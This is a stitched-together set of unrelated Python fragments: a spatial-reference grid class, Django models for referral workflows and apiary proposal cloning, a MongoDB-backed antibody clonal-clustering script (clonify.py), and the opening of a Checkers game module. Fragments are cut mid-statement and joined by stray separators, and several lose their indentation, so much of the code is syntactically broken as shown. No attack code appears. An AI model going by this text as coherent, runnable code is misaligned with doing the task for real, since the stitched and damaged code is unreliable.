1D array of cell vertices for whole grid in C-style (row-major) order
(same as np.ravel())
Notes
-----
xul and yul can be explicitly (re)set after SpatialReference
instantiation, but only before any of the other attributes and methods are
accessed
"""
xul, yul = None, None
xll, yll = None, None
rotation = 0.0
length_multiplier = 1.0
origin_loc = "ul" # or ll
defaults = {
"xul": None,
"yul": None,
"rotation": 0.0,
"proj4_str": None,
"units": None,
"lenuni": 2,
"length_multiplier": None,
"source": "defaults",
}
lenuni_values = {"undefined": 0, "feet": 1, "meters": 2, "centimeters": 3}
lenuni_text = {v: k for k, v in lenuni_values.items()}
def __init__(
self,
delr=np.array([]),
delc=np.array([]),
lenuni=2,
xul=None,
yul=None,
xll=None,
yll=None,
rotation=0.0,
proj4_str=None,
epsg=None,
prj=None,
units=None,
length_multiplier=None,
source=None,
):
for delrc | |
if not self.proposal.can_assess(request.user):
raise exceptions.ProposalNotAuthorized()
self.processing_status = 'recalled'
self.save()
send_referral_recall_email_notification(self, request)
# TODO Log proposal action
self.proposal.log_user_action(ProposalUserAction.RECALL_REFERRAL.format(self.id, self.proposal.lodgement_number), request)
# TODO log organisation action
self.proposal.applicant.log_user_action(ProposalUserAction.RECALL_REFERRAL.format(self.id, self.proposal.lodgement_number), request)
def remind(self, request):
    """Re-send the referral notification email as a reminder.

    Raises:
        ProposalNotAuthorized: if the requesting user cannot assess the proposal.
    """
    with transaction.atomic():
        if not self.proposal.can_assess(request.user):
            raise exceptions.ProposalNotAuthorized()
        referee = '{}({})'.format(self.referral.get_full_name(), self.referral.email)
        action = ProposalUserAction.ACTION_REMIND_REFERRAL.format(
            self.id, self.proposal.lodgement_number, referee)
        # Log against both the proposal and the applicant organisation.
        self.proposal.log_user_action(action, request)
        self.proposal.applicant.log_user_action(action, request)
        # Notify the referee by email, flagged as a reminder.
        send_referral_email_notification(self, request, reminder=True)
def resend(self, request):
    """Return a recalled referral to the referee and notify them.

    Raises:
        ProposalNotAuthorized: if the requesting user cannot assess the proposal.
    """
    with transaction.atomic():
        if not self.proposal.can_assess(request.user):
            raise exceptions.ProposalNotAuthorized()
        # Put both the referral and the parent proposal back into the
        # with_referral state.
        self.processing_status = 'with_referral'
        self.proposal.processing_status = 'with_referral'
        self.proposal.save()
        self.sent_from = 1
        self.save()
        referee = '{}({})'.format(self.referral.get_full_name(), self.referral.email)
        action = ProposalUserAction.ACTION_RESEND_REFERRAL_TO.format(
            self.id, self.proposal.lodgement_number, referee)
        # Log against both the proposal and the applicant organisation.
        self.proposal.log_user_action(action, request)
        self.proposal.applicant.log_user_action(action, request)
        # send email
        send_referral_email_notification(self, request)
def complete(self, request, referral_comment):
    """Mark this referral as completed, recording the referee's comments.

    Args:
        request: the current HTTP request; ``request.user`` must be the referee.
        referral_comment (str): the referee's response text.

    Raises:
        ReferralNotAuthorized: if the requesting user is not the referee.
    """
    # The original wrapped this body in ``try: ... except: raise`` -- a bare
    # except that only re-raises is a no-op, so it has been removed.
    with transaction.atomic():
        # Only the referee themselves may conclude the referral.
        if request.user != self.referral:
            raise exceptions.ReferralNotAuthorized()
        self.processing_status = 'completed'
        self.referral_text = referral_comment
        self.save()
        referee = '{}({})'.format(self.referral.get_full_name(), self.referral.email)
        action = ProposalUserAction.CONCLUDE_REFERRAL.format(
            self.id, self.proposal.lodgement_number, referee)
        # Log the conclusion against both the proposal and the applicant.
        self.proposal.log_user_action(action, request)
        self.proposal.applicant.log_user_action(action, request)
        send_referral_complete_email_notification(self, request)
def send_referral(self,request,referral_email,referral_text):
    """Forward this referral to another department user, creating a new
    Referral record for them and emailing a notification.

    Only the current referee may forward, and only while the proposal is in
    the 'with_referral' state and this referral was sent by an assessor
    (sent_from == 1).

    Raises:
        ReferralNotAuthorized: requesting user is not the referee.
        ReferralCanNotSend: this referral was itself forwarded (sent_from != 1).
        ValidationError: target user is invalid or already has a referral.
        ProposalReferralCannotBeSent: proposal is not in 'with_referral'.
    """
    with transaction.atomic():
        try:
            referral_email = referral_email.lower()
            if self.proposal.processing_status == 'with_referral':
                if request.user != self.referral:
                    raise exceptions.ReferralNotAuthorized()
                if self.sent_from != 1:
                    raise exceptions.ReferralCanNotSend()
                self.proposal.processing_status = 'with_referral'
                self.proposal.save()
                referral = None
                # Check if the user is in ledger
                try:
                    # NOTE(review): icontains matches substrings, so this can
                    # match (or raise MultipleObjectsReturned for) an unrelated
                    # address -- looks like an exact iexact lookup is intended;
                    # confirm before changing.
                    user = EmailUser.objects.get(email__icontains=referral_email)
                except EmailUser.DoesNotExist:
                    # Validate if it is a department user
                    department_user = get_department_user(referral_email)
                    if not department_user:
                        raise ValidationError('The user you want to send the referral to is not a member of the department')
                    # Check if the user is in ledger or create
                    user,created = EmailUser.objects.get_or_create(email=department_user['email'].lower())
                    if created:
                        user.first_name = department_user['given_name']
                        user.last_name = department_user['surname']
                        user.save()
                # A user this referral chain already flows through cannot be a target.
                qs=Referral.objects.filter(sent_by=user, proposal=self.proposal)
                if qs:
                    raise ValidationError('You cannot send referral to this user')
                try:
                    Referral.objects.get(referral=user,proposal=self.proposal)
                    raise ValidationError('A referral has already been sent to this user')
                except Referral.DoesNotExist:
                    # Create Referral (sent_from=2 marks it as referee-forwarded)
                    referral = Referral.objects.create(
                        proposal = self.proposal,
                        referral=user,
                        sent_by=request.user,
                        sent_from=2,
                        text=referral_text
                    )
                    # Create a log entry for the proposal
                    self.proposal.log_user_action(ProposalUserAction.ACTION_SEND_REFERRAL_TO.format(referral.id,self.proposal.lodgement_number,'{}({})'.format(user.get_full_name(),user.email)),request)
                    # Create a log entry for the organisation
                    self.proposal.applicant.log_user_action(ProposalUserAction.ACTION_SEND_REFERRAL_TO.format(referral.id,self.proposal.lodgement_number,'{}({})'.format(user.get_full_name(),user.email)),request)
                    # send email
                    send_referral_email_notification(referral,request)
            else:
                raise exceptions.ProposalReferralCannotBeSent()
        except:
            raise
# Properties
@property
def region(self):
return self.proposal.region
@property
def activity(self):
    # Convenience passthrough to the parent proposal's activity.
    return self.proposal.activity
@property
def title(self):
    # Convenience passthrough to the parent proposal's title.
    return self.proposal.title
@property
def applicant(self):
    # Name of the organisation/person that lodged the parent proposal.
    return self.proposal.applicant.name
@property
def can_be_processed(self):
    # A referral is actionable only while it is in the 'with_referral' state.
    return self.processing_status == 'with_referral'
def can_assess_referral(self, user):
    # NOTE(review): ``user`` is currently ignored -- any user passes as long
    # as the referral is 'with_referral'. Confirm this is intentional.
    return self.processing_status == 'with_referral'
@receiver(pre_delete, sender=Proposal)
def delete_documents(sender, instance, *args, **kwargs):
    """Delete every attached document just before a Proposal row is deleted."""
    for document in instance.documents.all():
        document.delete()
def clone_proposal_with_status_reset(proposal):
    """Clone an existing proposal as a fresh 'draft' proposal.

    The passed-in instance is reset to draft state, saved as a *new* row
    (by clearing its primary key), and its documents are duplicated both in
    the database and on the file system.

    Note: the caller's ``proposal`` object is mutated in place and, after
    ``save()``, refers to the newly created row.

    Returns the new (cloned) proposal.
    """
    # The former ``try/except: raise`` wrapper was a no-op and has been
    # removed; transaction.atomic() already rolls back on any exception.
    with transaction.atomic():
        proposal.customer_status = 'draft'
        proposal.processing_status = 'draft'
        proposal.assessor_data = None
        proposal.comment_data = None
        proposal.lodgement_number = ''
        proposal.lodgement_sequence = 0
        proposal.lodgement_date = None
        proposal.assigned_officer = None
        proposal.assigned_approver = None
        proposal.approval = None
        original_proposal_id = proposal.id
        # Clearing the pk makes the subsequent save() INSERT a new row.
        proposal.id = None
        proposal.approval_level_document = None
        proposal.save(no_revision=True)
        # Clone the document records and point them at the new proposal.
        for proposal_document in ProposalDocument.objects.filter(proposal=original_proposal_id):
            proposal_document.proposal = proposal
            proposal_document.id = None
            proposal_document._file.name = u'proposals/{}/documents/{}'.format(proposal.id, proposal_document.name)
            proposal_document.can_delete = True
            proposal_document.save()
        # Copy the document files on disk (preserving permissions). Both ids
        # are database-generated integers, so the shell string is safe here.
        subprocess.call('cp -pr media/proposals/{} media/proposals/{}'.format(original_proposal_id, proposal.id), shell=True)
        return proposal
def clone_apiary_proposal_with_status_reset(original_proposal):
    """Clone an apiary proposal (and related records) for a renewal.

    Creates a new draft Proposal deep-copied from ``original_proposal``,
    attaches a fresh ProposalApiary, copies the approval's current (non-
    deleted) requirements, links the approval's apiary sites to the new
    proposal and recreates the applicant checklist answers.

    Returns the newly created Proposal.
    """
    # The former ``try/except: raise`` wrapper was a no-op and has been
    # removed; transaction.atomic() already rolls back on any exception.
    with transaction.atomic():
        proposal = copy.deepcopy(original_proposal)
        proposal.id = None  # save() below will INSERT a new row
        proposal.application_type = ApplicationType.objects.get(name=ApplicationType.APIARY)
        proposal.save(no_revision=True)
        # Create a ProposalApiary and associate it with the new proposal.
        proposal_apiary = ProposalApiary.objects.create(proposal=proposal)
        proposal_apiary.save()
        # Reset workflow/lodgement state so the clone starts as a draft renewal.
        proposal.customer_status = 'draft'
        proposal.processing_status = 'draft'
        proposal.assessor_data = None
        proposal.comment_data = None
        proposal.lodgement_number = ''
        proposal.lodgement_sequence = 0
        proposal.lodgement_date = None
        proposal.assigned_officer = None
        proposal.assigned_approver = None
        proposal.approval_level_document = None
        proposal.fee_invoice_reference = None
        proposal.activity = 'Apiary Renewal'
        proposal.save(no_revision=True)
        # Clone the non-deleted requirements from the originating approval,
        # recording each clone's source via ``copied_from``.
        approval = original_proposal.proposal_apiary.retrieve_approval
        for requirement in approval.proposalrequirement_set.exclude(is_deleted=True):
            original_requirement = copy.deepcopy(requirement)
            requirement.proposal = proposal
            requirement.copied_from = original_requirement
            requirement.id = None  # save() INSERTs the clone as a new row
            requirement.save()
        # Link the approval's apiary sites to the new proposal for renewal.
        approval.add_apiary_sites_to_proposal_apiary_for_renewal(proposal_apiary)
        # Recreate the applicant checklist answers for the new proposal.
        for question in ApiaryChecklistQuestion.objects.filter(
                checklist_type='apiary',
                checklist_role='applicant'):
            ApiaryChecklistAnswer.objects.create(proposal=proposal.proposal_apiary,
                                                 question=question)
        return proposal
def searchKeyWords(searchWords, searchProposal, searchApproval, searchCompliance, is_internal=True):
    """Search proposals, approvals and/or compliances for keyword matches.

    Returns a list of result dicts. The three ``search*`` flags select which
    record types are scanned. The former ``try/except: raise`` wrappers were
    no-ops and have been removed.

    NOTE(review): when ``is_internal`` is False the ``*_list`` variables are
    never defined, so an external search would raise NameError -- external
    search appears unsupported here; confirm.
    """
    from disturbance.utils import search, search_approval, search_compliance
    from disturbance.components.approvals.models import Approval
    from disturbance.components.compliances.models import Compliance
    qs = []
    if is_internal:
        proposal_list = Proposal.objects.filter(application_type__name='Disturbance').exclude(processing_status__in=[Proposal.PROCESSING_STATUS_DISCARDED, Proposal.PROCESSING_STATUS_DRAFT])
        approval_list = Approval.objects.all().order_by('lodgement_number', '-issue_date').distinct('lodgement_number')
        compliance_list = Compliance.objects.all()
    if searchWords:
        if searchProposal:
            for p in proposal_list:
                if p.data:
                    results = search(p.data[0], searchWords)
                    if results:
                        # NOTE(review): only the last key/value pair survives
                        # because update() overwrites on every iteration --
                        # preserved as-is; confirm this is the intended shape.
                        final_results = {}
                        for r in results:
                            for key, value in r.items():
                                final_results.update({'key': key, 'value': value})
                        qs.append({
                            'number': p.lodgement_number,
                            'id': p.id,
                            'type': 'Proposal',
                            'applicant': p.applicant.name,
                            'text': final_results,
                        })
        if searchApproval:
            for a in approval_list:
                qs.extend(search_approval(a, searchWords))
        if searchCompliance:
            for c in compliance_list:
                qs.extend(search_compliance(c, searchWords))
    return qs
def search_reference(reference_number):
    """Resolve a lodgement/reference number to a record descriptor.

    Looks up, in order: proposals, approvals, then compliances, and returns
    a dict ``{'id': ..., 'type': 'proposal'|'approval'|'compliance'}``.

    Raises ValidationError when no record matches.
    """
    from disturbance.components.approvals.models import Approval
    from disturbance.components.compliances.models import Compliance
    proposal_list = Proposal.objects.all().exclude(processing_status__in=[Proposal.PROCESSING_STATUS_DISCARDED,])
    approval_list = Approval.objects.all().order_by('lodgement_number', '-issue_date').distinct('lodgement_number')
    compliance_list = Compliance.objects.all().exclude(processing_status__in=['future'])
    record = {}
    try:
        result = proposal_list.get(lodgement_number = reference_number)
        record = { 'id': result.id,
                   'type': 'proposal' }
    except Proposal.DoesNotExist:
        try:
            result = approval_list.get(lodgement_number = reference_number)
            record = { 'id': result.id,
                       'type': 'approval' }
        except Approval.DoesNotExist:
            try:
                # Compliance references are computed per-object, so scan the
                # queryset instead of filtering in the database.
                for c in compliance_list:
                    if c.reference == reference_number:
                        record = { 'id': c.id,
                                   'type': 'compliance' }
            except:
                # Any error while scanning is reported as "not found".
                raise ValidationError('Record with provided reference number does not exist')
    if record:
        return record
    else:
        raise ValidationError('Record with provided reference number does not exist')
from ckeditor.fields import RichTextField
class HelpPage(models.Model):
    """Versioned rich-text help page for an application type.

    A page is either external (public-facing) or internal, and successive
    versions of the same (application_type, help_type) pair are kept
    side by side.
    """
    HELP_TEXT_EXTERNAL = 1
    HELP_TEXT_INTERNAL = 2
    HELP_TYPE_CHOICES = (
        (HELP_TEXT_EXTERNAL, 'External'),
        (HELP_TEXT_INTERNAL, 'Internal'),
    )
    application_type = models.ForeignKey(ApplicationType)
    content = RichTextField()  # CKEditor-backed rich text body
    description = models.CharField(max_length=256, blank=True, null=True)
    help_type = models.SmallIntegerField('Help Type', choices=HELP_TYPE_CHOICES, default=HELP_TEXT_EXTERNAL)
    version = models.SmallIntegerField(default=1, blank=False, null=False)

    class Meta:
        app_label = 'disturbance'
        # Exactly one row per (application type, audience, version).
        unique_together = ('application_type', 'help_type', 'version')
# --------------------------------------------------------------------------------------
# Apiary Models Start
# --------------------------------------------------------------------------------------
class ApiarySiteOnProposal(RevisionedMixin):
    """Through model linking an ApiarySite to a ProposalApiary.

    Carries the per-proposal state of a site: status snapshots taken at
    submission, draft vs processed geometry/category, and payment/workflow
    bookkeeping flags.
    """
    apiary_site = models.ForeignKey('ApiarySite',)
    proposal_apiary = models.ForeignKey('ProposalApiary',)
    # Snapshot of the site's status/vacancy taken when the proposal was submitted.
    apiary_site_status_when_submitted = models.CharField(max_length=40, blank=True)
    apiary_site_is_vacant_when_submitted = models.BooleanField(default=False)
    for_renewal = models.BooleanField(default=False)
    site_status = models.CharField(default=SITE_STATUS_DRAFT, max_length=20, db_index=True)
    making_payment = models.BooleanField(default=False)
    workflow_selected_status = models.BooleanField(default=False) # This field is used only during approval process to select/deselect the site to be approved
    created_at = models.DateTimeField(auto_now_add=True)
    modified_at = models.DateTimeField(auto_now=True)
    wkb_geometry_draft = PointField(srid=4326, blank=True, null=True) # store the coordinates before submit
    wkb_geometry_processed = PointField(srid=4326, blank=True, null=True) # store approved coordinates
    site_category_draft = models.ForeignKey('SiteCategory', null=True, blank=True, related_name='intermediate_draft')
    site_category_processed = models.ForeignKey('SiteCategory', null=True, blank=True, related_name='intermediate_processed')
    application_fee_paid = models.BooleanField(default=False) # To avoid overcharging when the proposal is sent back to the customer, we need this flag
    objects = GeoManager()

    def __str__(self):
        return 'id:{}: (apiary_site: {}, proposal_apiary: {})'.format(self.id, self.apiary_site.id, self.proposal_apiary.id)

    class Meta:
        app_label = 'disturbance'
        # A site can appear on a given ProposalApiary at most once.
        unique_together = ['apiary_site', 'proposal_apiary',]
class ProposalApiary(RevisionedMixin):
title = models.CharField('Title', max_length=200, null=True)
location = gis_models.PointField(srid=4326, blank=True, null=True)
proposal = models.OneToOneField(Proposal, related_name='proposal_apiary', null=True)
# We don't use GIS field, because these are just fields user input into the <input> field
latitude = models.DecimalField(max_digits=9, decimal_places=6, null=True, blank=True)
longitude = models.DecimalField(max_digits=9, decimal_places=6, null=True, blank=True)
# required for Site Transfer applications
# transferee used to store EmailUser without existing licence
transferee = models.ForeignKey(EmailUser, blank=True, null=True, related_name='apiary_transferee')
transferee_email_text = models.CharField(max_length=200, null=True)
originating_approval = models.ForeignKey('disturbance.Approval', blank=True, null=True, related_name="site_transfer_originating_approval")
target_approval = models.ForeignKey('disturbance.Approval', blank=True, null=True, related_name="site_transfer_target_approval")
target_approval_organisation = models.ForeignKey(Organisation, blank=True, null=True)
target_approval_start_date = models.DateField(blank=True, null=True)
target_approval_expiry_date = models.DateField(blank=True, null=True)
reissue_originating_approval = models.BooleanField(default=False)
reissue_target_approval = models.BooleanField(default=False)
apiary_sites = models.ManyToManyField('ApiarySite', through=ApiarySiteOnProposal, related_name='proposal_apiary_set')
#self_clone = models.ForeignKey('self', on_delete=models.SET_NULL, blank=True, null=True)
public_liability_insurance_expiry_date = models.DateField(null=True, blank=True)
def __str__(self):
    # e.g. "id:12 - Some apiary proposal title"
    return 'id:{} - {}'.format(self.id, self.title)
class Meta:
app_label = 'disturbance'
def validate_apiary_sites(self, raise_exception=False):
validity = True
# Check if the site has been already taken by someone else
for apiary_site in self.apiary_sites.all():
if apiary_site.is_vacant:
# The site is 'vacant'
others = ApiarySiteOnProposal.objects.filter(Q(apiary_site=apiary_site), (Q(making_payment=True) | Q(site_status=SITE_STATUS_PENDING))).exclude(proposal_apiary=self)
if others:
# Someone has been making payment for this apiary site
validity = False
else:
# The site is not 'vacant'
relation = self.get_relation(apiary_site)
if relation != apiary_site.latest_proposal_link:
validity = False
if not validity and raise_exception:
# raise ValidationError(message='The vacant apiary site: {} is | |
#!/usr/local/bin/python
# filename: clonify.py
#
# Copyright (c) 2015 <NAME>
# License: The MIT license (http://opensource.org/licenses/MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software
# and associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
import argparse
# import celery
from collections import OrderedDict
import json
import math
import multiprocessing as mp
import os
import sqlite3
import subprocess as sp
import sys
import tempfile
import time
import traceback
import urllib.request, urllib.parse, urllib.error
from abutils.utils import log, mongodb, progbar
from abutils.utils.pipeline import make_dir
# from abtools.queue.celery import celery
from .utils import cluster
from .utils.cluster import Cluster, Clusters
from .utils.database import Database
if sys.version_info[0] > 2:
import pickle
else:
import cPickle as pickle
def parse_args():
    """Parse and return the clonify command-line options (argparse.Namespace)."""
    parser = argparse.ArgumentParser("")
    parser.add_argument('-d', '--db', dest='db', required=True,
                        help="The MongoDB database to be queried. Required.")
    parser.add_argument('-c', '--collection', dest='collection', default=None,
                        help="The MongoDB collection to be queried. \
                        If ommitted, sequences from all collections in the database will be processed.")
    parser.add_argument('--collection-prefix', dest='collection_prefix', default=None,
                        help="If supplied, Clonify will process only collections beginning with <collection_prefix>.")
    parser.add_argument('--collection-prefix-split', default=None,
                        help="If supplied, will split all collection names at the <split-num> occurance of the supplied string \
                        and group all collections with identical prefixes. --pool=True is implied with this option.")
    parser.add_argument('--collection-prefix-split-pos', default=0, type=int,
                        help="If supplied, will group all collections that are identical for the first <collection-prefix-split-pos> \
                        characters. --pool=True is implied with this option.")
    parser.add_argument('--split-num', default=1, type=int,
                        help="With <collection-prefix-split>, collection names will be split at the <split-num> occurance of \
                        <collection-prefix-split>. Uses 1-based indexing. Default is 1.")
    parser.add_argument('--pool', dest='pool', default=False, action='store_true',
                        help="If set, all collections will be pooled and processed as a single group.")
    parser.add_argument('-i', '--ip', dest='ip', default='localhost',
                        help="The IP address of the MongoDB server. Defaults to 'localhost'.")
    parser.add_argument('-P', '--port', dest='port', default=27017, type=int,
                        help="The port used to connect to the MongoDB server. Defaults to '27017'.")
    parser.add_argument('-u', '--user', dest='user', default=None,
                        help="Username for the MongoDB server. Not used if not provided.")
    parser.add_argument('-p', '--password', dest='password', default=None,
                        help="Password for the MongoDB server. Not used if not provided.")
    parser.add_argument('-o', '--out', dest='output', default='',
                        help="Directory for the output files. Files will be named '<collection>_clones.txt'. \
                        Failing to provide an output directory will result in no output files being written.")
    parser.add_argument('-t', '--temp', dest='temp', default='/tmp',
                        help="The directory in which temp files will be stored. \
                        If the directory doesn't exist, it will be created. Default is '/tmp'.")
    parser.add_argument('-l', '--log', dest='logfile',
                        help="Path to the log file. Required.")
    parser.add_argument('--non-redundant', default=False,
                        help="Collapses identical sequences prior to running Clonify. \
                        Stores redundant sequence info so that the complete redundant Mongo database will be \
                        updated with lineage info (non-redunant sequences are re-expanded prior to database update). \
                        Options are 'nt' or 'aa', which collapse identical nucleotide or amino acid sequences, respectively. \
                        Best for collections that contain redundant sequences \
                        and are large enough to cause clonify segfaults.")
    parser.add_argument('--clustering-threshold', default=1.0, type=float,
                        help="Clustering threshold to be used with the --non-redundant option. \
                        Default is 1.0.")
    # The following option ('-x') doesn't do anything at the moment.
    parser.add_argument('-x', '--dist', dest='distance_cutoff', default=0.35, type=float,
                        help="NOT YET IMPLEMENTED. The cutoff adjusted edit distance (aED) for segregating \
                        sequences into clonal families. Defaults to 0.35.")
    parser.add_argument('-C', '--celery', dest="celery", default=False, action='store_true',
                        help="NOT YET IMPLEMENTED. Use if performing computation on a Celery cluster. \
                        If set, input files will be split into many subfiles and passed \
                        to a Celery queue. If not set, input files will still be split, but \
                        will be distributed to local processors using multiprocessing.")
    parser.add_argument('-w', '--num-map-workers', dest='num_map_workers', type=int, default=1,
                        help='The number of map process that will be spawned. Default is 1. \
                        Set to 0 to use the max number of available cores, whether on a local \
                        machine using multiprocessing or on a Celery cluster.')
    parser.add_argument('-n', '--no_update', dest='update', action='store_false', default=True,
                        help="Use to skip updating the MongoDB database with clonality info.")
    parser.add_argument('--test-algo', action='store_true', default=False,
                        help='Tests whether the cluster program works. Useful for troubleshooting.')
    parser.add_argument('-D', '--debug', dest='debug', action='store_true', default=False,
                        help="If set, will run in debug mode.")
    return parser.parse_args()
class Args(object):
    """Programmatic equivalent of the command-line options.

    Lets clonify be driven as an API: mirrors the options produced by
    parse_args(). ``db``, ``temp`` and ``log`` are required; the process
    exits with status 1 if any of them is missing.
    """

    def __init__(self, db=None, collection=None,
                 collection_prefix=None, collection_prefix_split=None, collection_prefix_split_pos=0,
                 split_num=1, pool=False, ip='localhost', port=27017, user=None, password=None,
                 output='', temp=None, log=None, non_redundant=False, clustering_threshold=1.0,
                 distance_cutoff=0.35, celery=False, update=True, debug=False):
        super(Args, self).__init__()
        # BUG FIX: this previously checked the undefined name ``logfile``
        # (raising NameError); the parameter is named ``log``. The corrupted
        # ``password=<PASSWORD>`` default was also restored to None.
        if any([db is None, temp is None, log is None]):
            print('ERROR: the following options are required:')
            print('--db, --temp, --log')
            sys.exit(1)
        self.db = db
        self.collection = collection
        self.collection_prefix = collection_prefix
        self.collection_prefix_split = collection_prefix_split
        self.collection_prefix_split_pos = int(collection_prefix_split_pos)
        self.split_num = int(split_num)
        self.pool = pool
        self.ip = ip
        self.port = int(port)
        self.user = user
        self.password = password
        self.output = output
        self.temp = temp
        self.logfile = log  # stored under the name parse_args() uses
        self.non_redundant = non_redundant
        self.clustering_threshold = clustering_threshold
        self.distance_cutoff = float(distance_cutoff)
        self.celery = celery
        self.update = update
        self.debug = debug
def validate_args(args):
    """Create the output and temp directories if they were supplied.

    BUG FIX: the previous ``is not None`` check let the empty string (the
    default for ``args.output``) through to make_dir(); empty and None
    values are now both skipped.
    """
    for d in (args.output, args.temp):
        if d:
            make_dir(d)
################################
#
# MONGO
#
################################
def get_collection_groups(args):
    """Return the groups of MongoDB collections to process.

    Each group is a list of collection names that will be pooled together.
    Selection honors, in priority order: an explicit collection (or a file
    listing collections), a name prefix, prefix-splitting options (which
    imply pooling), and finally the global --pool flag.
    """
    if args.collection:
        if os.path.isfile(args.collection):
            # The "collection" is a file containing one collection name per line.
            with open(args.collection) as f:
                named = sorted(line.strip() for line in f)
            return [named] if args.pool else [[c] for c in named]
        # A single literal collection name.
        return [[args.collection]]
    all_collections = db.collection_names(include_system_collections=False)
    if args.collection_prefix:
        matching = sorted(c for c in all_collections if c.startswith(args.collection_prefix))
        return [matching] if args.pool else [[c] for c in matching]
    if args.collection_prefix_split:
        args.pool = True  # splitting implies pooling
        sep = args.collection_prefix_split
        prefixes = sorted({sep.join(c.split(sep)[:args.split_num]) for c in all_collections})
        return [sorted(c for c in all_collections if c.startswith(p)) for p in prefixes]
    if args.collection_prefix_split_pos:
        args.pool = True  # position-based grouping implies pooling
        pos = args.collection_prefix_split_pos
        prefixes = sorted({c[:pos] for c in all_collections})
        return [sorted(c for c in all_collections if c.startswith(p)) for p in prefixes]
    if args.pool:
        return [sorted(all_collections)]
    return [[c] for c in sorted(all_collections)]
def get_collections(args):
    """Return a sorted, flat list of collection names to process.

    An explicit --collection may be a literal name or a file listing one
    collection per line; otherwise all collections in the database are
    used, optionally filtered by --collection-prefix.
    """
    if args.collection:
        if not os.path.isfile(args.collection):
            return [args.collection]
        with open(args.collection) as f:
            return sorted(line.strip() for line in f)
    names = db.collection_names(include_system_collections=False)
    if args.collection_prefix:
        names = [c for c in names if c.startswith(args.collection_prefix)]
    return sorted(names)
def query(collection, args):
    """Fetch all productive heavy-chain records (CDR3 length >= 2).

    Returns a list of dicts limited to the fields clonify needs.
    """
    criteria = {'chain': 'heavy', 'prod': 'yes', 'cdr3_len': {'$gte': 2}}
    projection = {'_id': 0, 'seq_id': 1, 'v_gene.full': 1, 'j_gene.full': 1, 'junc_aa': 1,
                  'vdj_nt': 1, 'vdj_aa': 1, 'var_muts_nt': 1}
    return list(db[collection].find(criteria, projection))
def ensure_index(field, group):
    """Ensure a MongoDB index on ``field`` for every collection in ``group``."""
    logger.info('\nEnsuring indexes prior to updating:')
    for collection in group:
        logger.info("Indexing '{}' on {}...".format(field, collection))
        coll = db[collection]
        # NOTE(review): ensure_index() is deprecated in modern pymongo
        # (create_index is the replacement); kept for the driver in use.
        coll.ensure_index(field)
def update_db(clusters, group):
    """Write clonality assignments for every cluster back to MongoDB.

    Fans per-cluster updates out over a multiprocessing pool and returns
    the list of cluster sizes.
    """
    print_update_info()
    start = time.time()
    sizes = []
    # NOTE(review): 250 worker processes is far above typical core counts;
    # the work is Mongo/network-bound, but confirm this size is intentional.
    p = mp.Pool(processes=250)
    async_results = []
    for c in clusters:
        sizes.append(c.size)
        async_results.append(p.apply_async(update, args=(c, group)))
    monitor_update(async_results)
    p.close()
    p.join()
    seq_count = sum(sizes)
    run_time = time.time() - start
    logger.info('Updating took {} seconds. ({} sequences per second)'.format(round(run_time, 2), round(seq_count / run_time, 1)))
    return sizes
def update(clust, group):
    """Tag every sequence in ``clust`` with its lineage id and size.

    Applied to each collection in ``group``; runs in a pool worker.
    """
    for collection in group:
        c = db[collection]
        c.update_many({'seq_id': {'$in': clust.seq_ids}},
                      {'$set': {'clonify': {'id': clust.name, 'size': clust.size}}})
def get_sequences(collection_group, args):
    """Query every collection in ``collection_group`` and pool the records.

    When args.non_redundant is set, identical sequences are collapsed via
    the nr helper (and the redundancy info is stored for later re-expansion).
    Returns the combined list of sequence records.
    """
    nr_db = None
    if args.non_redundant:
        from .utils import nr
        nr_db = nr.make_nr_seq_db(args)
    seqs = []
    for collection in collection_group:
        print_collection_info(collection)
        coll_seqs = query(collection, args)
        if args.non_redundant:
            nr_coll_seqs = nr.make_nr(coll_seqs, nr_db, args)
            seqs += nr_coll_seqs
            print_query_info(coll_seqs, nr=nr_coll_seqs)
        else:
            seqs += coll_seqs
            print_query_info(coll_seqs)
    return seqs
################################
#
# SQLITE
#
################################
def build_json_db(seq_ids, json_files, args):
    """Build and index an on-disk DB mapping JSON file -> seq_id.

    Returns the (closed) Database object; callers reopen it as needed.
    """
    logger.info('')
    logger.info('Building a database of JSON files...')
    jsondb = Database('json_db', args.temp)
    jsondb.insert_many(list(zip(json_files, seq_ids)))
    # for j, s in zip(json_files, seq_ids):
    #     jsondb[j] = s
    jsondb.commit()
    logger.info('Indexing...')
    jsondb.index()
    jsondb.close()
    return jsondb
def build_mr_db(sequences, args):
logger.info('')
logger.info('Building a database of sequences...')
# hackety hackerson to pickle the JSON data into | |
<gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
###############################################################################
# Checkers.py
#
# Revision: 1.00
# Date: 11/11/2020
# Author: Alex
#
# Purpose: Contains all functions necessary to implement the Checkers
# game environment.
#
# Notes:
# 1. Run this module to see a demonstration game of Checkers.
# 2. Rules are according to the World Checkers Draughts Federation (WCDF).
# 3. https://www.wcdf.net/rules.htm
#
###############################################################################
"""
import numpy as np
from copy import deepcopy
from tabulate import tabulate
import time
class Checkers:
"""Class to represent a game of Checkers."""
def __init__(self, neural_net=None):
    """Initialize the class with the pieces in their starting positions.
    Get a list of valid (legal) next moves. Moves are not explicitly
    represented; instead possible next states of the game board are
    generated. The player's move is implied by selecting one of these
    possible next states.

    The game state is a 3 dimensional NumPy array of 15 8x8 arrays.
    These 8x8 arrays represent the 8x8 game board, where:

    0. Array 0 represents the locations of player 1's uncrowned men.
    1. Array 1 represents the locations of player 1's kings.
    2. Array 2 represents the locations of player 2's uncrowned men.
    3. Array 3 represents the locations of player 2's kings.
    4. Array 4 indicates the current player (all 0s for P1, all 1s for P2)
    5. Array 5 is the draw timer; counts in increments of 1/80
